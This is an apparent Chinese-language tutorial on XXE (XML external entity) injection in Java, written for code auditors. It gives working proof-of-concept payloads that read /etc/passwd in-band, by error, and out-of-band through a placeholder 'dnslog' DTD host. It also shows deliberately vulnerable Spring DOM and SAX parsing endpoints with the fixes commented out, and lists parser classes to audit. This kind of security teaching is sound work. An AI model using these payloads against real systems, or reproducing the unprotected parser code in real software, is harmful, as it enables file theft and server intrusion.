一、什么是XXE漏洞
xxe攻击也叫xml外部实体注入攻击,是一种常见的Web应用安全漏洞,通过漏洞可导致任意文件读取、目录遍历、探测内网端口、攻击内网网站、发起DoS拒绝服务攻击、执行系统命令等安全问题。
当应用程序使用XML处理器解析外部XML实体时,可能会发生XXE漏洞,使用场景比如后台解析xml请求包、文件上传excel或word文档时后端代码解析等。
二、XXE漏洞利用
xxe漏洞利用方式有很多,大致可分为有回显、无回显、基于报错的攻击利用。篇幅原因仅简单见解,网上有很多大佬已经说的非常通透了,具体看这两篇文章很全面的介绍了XXE漏洞的攻击方式。
https://xz.aliyun.com/t/3357 https://tttang.com/archive/1813/
有回显的利用POC:
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY file SYSTEM "file:///etc/passwd">]><root>&file;</root>
无回显利用POC:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://dnslog/ext.dtd">%aaa;%ccc;%ddd;]>
基于报错的利用POC:
poc来自phith0n(p牛)的代码审计(知识星球),也可以看:https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
<?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % NUMBER ' <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; '> %NUMBER; ]> <message>any text</message>
Office XXE:
这个漏洞在src挖掘中有挖到过,具体漏洞利用见:https://www.cnblogs.com/chm0d/p/17668508.html
三、XML解析代码演示
这里介绍java原生自带的xml解析DOM解析与SAX解析。
DOM (Document Object Model) 解析:这是一种基于树的解析器,它将整个 XML 文档加载到内 存中,并将文档组织成一个树形结构。
@RestController
public class DOMTest {
@RequestMapping(value = "/domDemo/vul",method = RequestMethod.POST)
public String domDemo(HttpServletRequest request){
try {
//获取输入流
InputStream in = request.getInputStream();
String body = convertStream.convertStreamToString(in);
StringReader sr = new StringReader(body);
InputSource is = new InputSource(sr);
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
/* 修复:禁止外部实体引用
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
*/
DocumentBuilder db = dbf.newDocumentBuilder();
Document document = db.parse(is);
// 遍历xml节点name和value
StringBuilder buf = new StringBuilder();
NodeList rootNodeList = document.getChildNodes();
for (int i = 0; i < rootNodeList.getLength(); i++) {
Node rootNode = rootNodeList.item(i);
NodeList child = rootNode.getChildNodes();
for (int j = 0; j < child.getLength(); j++) {
Node node = child.item(j);
buf.append(String.format("%s: %s\n", node.getNodeName(), node.getTextContent()));
}
}
sr.close();
return buf.toString();
} catch (Exception e) {
return "EXCEPT ERROR!!!";
}
}
}
SAX (Simple API for XML) 解析:这是一种基于事件的解析器,它逐行读取 XML 文档并触发特定的 事件。
@RestController public class SAXTest { @RequestMapping("/saxDemo/vul") public String saxDemo(HttpServletRequest request) throws IOException { //获取输入流 InputStream in = request.getInputStream(); String body = convertStream.convertStreamToString(in); try { SAXParserFactory spf = SAXParserFactory.newInstance(); // spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); SAXParser parser = spf.newSAXParser(); SAXParserHandler handler = new SAXParserHandler(); //解析xml parser.parse(new InputSource(new StringReader(body)),handler); return "Sax xxe vule code"; } catch (Exception e) { return "ERROR...."; } } }
还有其他几种方式解析xml并介绍了对应的防御:https://blog.spoock.com/2018/10/23/java-xxe/
setFeature有时也无法防止xxe:https://b1ue.cn/archives/387.html
四、XXE漏洞审计函数(方法)
XMLReaderFactory
createXMLReader
SAXBuilder
SAXReader
SAXParserFactory
newSAXParser
Digester
DocumentBuilderFactory
DocumentBuilder
XMLReader
DocumentHelper
XMLStreamReader
SAXParser
SAXSource
TransformerFactory
SAXTransformerFactory
SchemaFactory
Unmarshaller
XPathExpression
javax.xml.parsers.DocumentBuilder
javax.xml.parsers.DocumentBuilderFactory
javax.xml.stream.XMLStreamReader
javax.xml.stream.XMLInputFactory
org.jdom.input.SAXBuilder
org.jdom2.input.SAXBuilder
org.jdom.output.XMLOutputter
oracle.xml.parser.v2.XMLParser
javax.xml.parsers.SAXParser
org.dom4j.io.SAXReader
org.dom4j.DocumentHelper
org.xml.sax.XMLReader
javax.xml.transform.sax.SAXSource
javax.xml.transform.TransformerFactory
javax.xml.transform.sax.SAXTransformerFactory
javax.xml.validation.SchemaFactory
javax.xml.validation.Validator
javax.xml.bind.Unmarshaller
javax.xml.xpath.XPathExpression
java.beans.XMLDecoder